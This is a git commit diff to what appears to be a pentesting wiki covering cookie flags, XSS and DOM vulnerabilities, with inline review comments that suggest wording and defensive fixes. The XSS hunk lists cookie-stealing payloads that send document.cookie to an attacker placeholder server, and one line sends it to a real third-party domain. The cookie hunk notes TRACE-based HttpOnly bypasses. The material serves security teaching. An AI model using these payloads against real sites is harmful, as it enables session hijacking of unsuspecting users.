GitBook: [master] 472 pages modified
This commit is contained in:
parent
5f83c0bdad
commit
e765a981c7
@ -119,6 +119,12 @@ A cookie with _**SameSite**_ attribute will **mitigate CSRF attacks** where a lo
This avoids the **client** to access the cookie \(Via **Javascript** for example: `document.cookie`\)
#### **Bypasses**
* This could be Bypassed with **TRACE** **HTTP** requests as the response from the server \(if this HTTP method is available\) will reflect the cookies sent. This technique is called **Cross-Site Tracking**.
* This technique is avoided by **modern browsers by not permitting sending a TRACE** request from JS. However, some bypassed to this have been found in specific software like sending `\r\nTRACE` instead of `TRACE` to IE6.0 SP2.
* Another way is the exploitation of zero/day vulnerabilities of the browsers.
### Secure
The request will **only** send the cookie in an HTTP request only if the request is transmitted over a secure channel \(typically **HTTPS**\).
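Review bot: the technique named at the end of the first bullet is "Cross-Site Tracing" (XST), not "Cross-Site Tracking"; please correct the term. Since that bullet already conditions the bypass on the TRACE method being available, state the server-side fix alongside it: disable TRACE on the web server (for example `TraceEnable off` in Apache httpd), so readers know what to recommend when they find it enabled. Minor wording in the same hunk: "This avoids the client to access the cookie" reads better as "This prevents the client from accessing the cookie", "some bypassed to this have been found" as "some bypasses of this have been found", "zero/day" should be "zero-day", and the Secure paragraph says "only" twice ("will only send the cookie ... only if").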
@ -67,6 +67,17 @@ In this case your input is reflected between **`<script> [...] </script>`** tags
There is **JS code** that is using **unsafely** some **data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
{% page-ref page="dom-xss.md" %}
### **Universal XSS**
These kind of XSS can be found **anywhere**. They not depend just on the client exploitation of a web application but on **any** **context**. These kind of **arbitrary JavaScript execution** can even be abuse to obtain **RCE**, **read** **arbitrary** **files** in clients and servers, and more.
Some **examples**:
{% page-ref page="server-side-xss-dynamic-pdf.md" %}
{% page-ref page="../../pentesting/pentesting-web/xss-to-rce-electron-desktop-apps.md" %}
## WAF bypass encoding image
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
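Review bot: the "WAF bypass encoding image" section consists of a single image whose alt text is a Twitter URL and carries no explanation; add a sentence saying what the image shows (which encodings it lists and in which contexts they apply) so the section is usable for screen readers and when the image fails to load, and move the attribution into the text rather than the alt attribute. Grammar in the same hunk: "These kind of XSS" should be "This kind of XSS", "They not depend just on" should be "They do not depend only on", "can even be abuse to obtain RCE" should be "abused", and the DOM sentence has a stray space in "`location.href` ." and a stray comma in "An attacker, could abuse".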
@ -484,7 +495,10 @@ Remember to look into what is already loaded! jQuery is an easy example, but any
## **DOM vulnerabilities**
There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**.**
**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**:**
{% page-ref page="dom-xss.md" %}
There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**.
Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
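Review bot: the sentence "There is JS code that is using unsafely data controlled by an attacker like `location.href` ..." now appears in two places in this commit with slightly different wording; since this section explicitly defers to dom-xss.md, keep one canonical phrasing here (or just the link) so the two copies do not drift apart. The two bold "Due to the extension of the explanation of ..." lines differ only in their final punctuation (period versus colon); make sure only the colon version that introduces the page-ref remains in the result. Also "how are they provoked" should read "how they are provoked", and the same stray space before the period after `location.href` and comma in "An attacker, could" as in the other file should be fixed.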
@ -592,6 +606,7 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
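Review bot: the placeholders in these payload lines are inconsistent (`<YOUR_SERVER_IP>` in some, `<IP>` in others); settle on one so readers substitute the right value everywhere. The three `location.href` / `location` / `document.location` lines perform the same redirect and could be collapsed into one entry with the alternative property names noted. From the defensive side, every line here reads `document.cookie`, so a one-line pointer to the HttpOnly hint that follows later in this file (and to the `Secure` and `SameSite` attributes on the cookie page touched by this same commit) would tell readers which cookie flag neutralises this whole block.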
@ -609,6 +624,10 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
```
{% hint style="info" %}
You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies.md#httponly) if you are lucky enough.
{% endhint %}
### Port Scanner \(fetch\)
```javascript
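Review bot: the `navigator.sendBeacon` line sends cookies to `https://ssrftest.com/x/AAAAA`, a concrete third-party domain, whereas the surrounding payloads use a `<YOUR_SERVER_IP>` placeholder; use the placeholder here as well so nobody copy-pastes a line that ships data to a host they do not control. In the hint, the attribute name is `HttpOnly` (not "HTTPOnly"), which also matches the `#httponly` anchor the link points to.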
@ -12,6 +12,10 @@
Fundamentally, DOM-based vulnerabilities arise when a website **passes data from a source to a sink**, which then handles the data in an unsafe way in the context of the client's session.
{% hint style="info" %}
**You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki)\*\*\*\*
{% endhint %}
**Common sources:**
```javascript
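Review bot: the hint line ends with a literal `\*\*\*\*` after the link, escaped-asterisk debris left over from the bold markup wrapped around the link; it will render as four visible asterisks, so remove it. Also "a more updated list" should read "a more up-to-date list".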